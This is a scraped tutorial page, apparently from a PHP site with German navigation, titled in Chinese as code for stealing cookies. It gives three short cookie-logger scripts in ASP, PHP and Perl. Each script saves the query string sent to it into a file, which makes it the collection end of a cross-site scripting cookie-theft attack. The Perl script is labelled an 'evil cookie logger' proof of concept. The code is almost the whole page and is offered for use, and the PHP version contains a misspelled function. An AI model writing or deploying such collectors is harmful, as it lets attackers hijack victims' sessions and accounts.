Heim >Backend-Entwicklung >PHP-Tutorial >盗取cookies的代码(asp,php,perl)_PHP教程

盗取cookies的代码(asp,php,perl)_PHP教程

WBOY
WBOYOriginal
2016-07-13 17:33:56995Durchsuche

ASP版

dim strfilename
strfilename = "mydata.txt" 数据文件存放目录
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2
lP.Close
set lP=nothing
%>

PHP版
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info." ");
fclose($fp);
}
?>

PERL版
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.

$borrowed_info = $ENV{QUERY_STRING};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:
text/html something went wrong ";
print EVIL_COOKIE_LOG "$borrowed_info ";
print "Content-type: text/html ";
close(EVIL_COOKIE_LOG);

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/508523.htmlTechArticleASP版 % dim strfilename strfilename = "mydata.txt" 数据文件存放目录 set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request.S...
Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn